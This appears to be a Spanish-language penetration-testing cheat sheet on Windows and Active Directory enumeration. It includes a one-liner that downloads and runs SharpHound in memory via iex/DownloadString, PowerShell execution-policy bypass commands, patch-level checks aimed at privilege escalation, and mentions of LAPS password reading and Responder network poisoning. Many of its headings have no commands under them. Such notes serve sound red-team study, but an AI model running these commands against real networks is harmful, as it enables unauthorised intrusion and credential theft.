Enumeracion
1. Enumeración de la máquina local
Sysinternals de Windows
Sysinternals Suite - Windows Sysinternals | Microsoft Docs
$ Get-ComputerInfoDescargar en memoria scripts
$ iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1'))comprobar si un equipo no tiene parches de seguridad instalados
$ HOSTNAME.EXE$ Get-WmiObject -Class win32_OperatingSystem | select version,buildnumber$ wmic qfe list full | findstr /i hotfixEn la web https://patchchecker.com/ podemos encontrar, según la versión de build de Windows, qué vulnerabilidades le afectarían debido a falta de actualizaciones, y puede ser usado para escalar privilegios.
2. Enumeración del dominio
Evadir las políticas de ejecución de Powershell
powershell.exe -executionpolicy bypass
powershell.exe -ep bypass
Set-ExecutionPolicy Unrestrictedver maquina del DC
Listar los usuarios del dominio
Listar los equipos del dominio
Listar los dominios del forest
Listar los tipos de "confianza" (trust) de los dominios/forest
La información de un grupo del dominio
Listar los miembros de un grupo del dominio
Listar shares del dominio, ignorando los default shares y check access
Listar política de contraseñas
Usuarios con el SID History (powerview)
Listar shares del dominio que el usuario actual tiene acceso
Comprobar configuracion de bitlocker
LAPS
Si LAPS se encuentra instalado en el equipo
Identificar si se encuentra instalado en el DC
Listar el atributo ms-mcs-admpwd
Lista el usuario o grupos que tienen permisos de lectura a la propiedad de LAPS para un equipo específico
Listar la ACL para todas las OU donde algún usuario tenga permisos de lectura sobre el atributo LAPS
Network poissoning
Una vez estamos conectados a la red de la infraestructura, con Responder podemos suplantar los servicios de LLMNR y NBT-NS, ya que se transmiten vía UDP
Bloodhound
Es la herramienta por excelencia para la enumeración de un dominio.
Para ello, se ha creado una sección explícita de la herramienta.
Last updated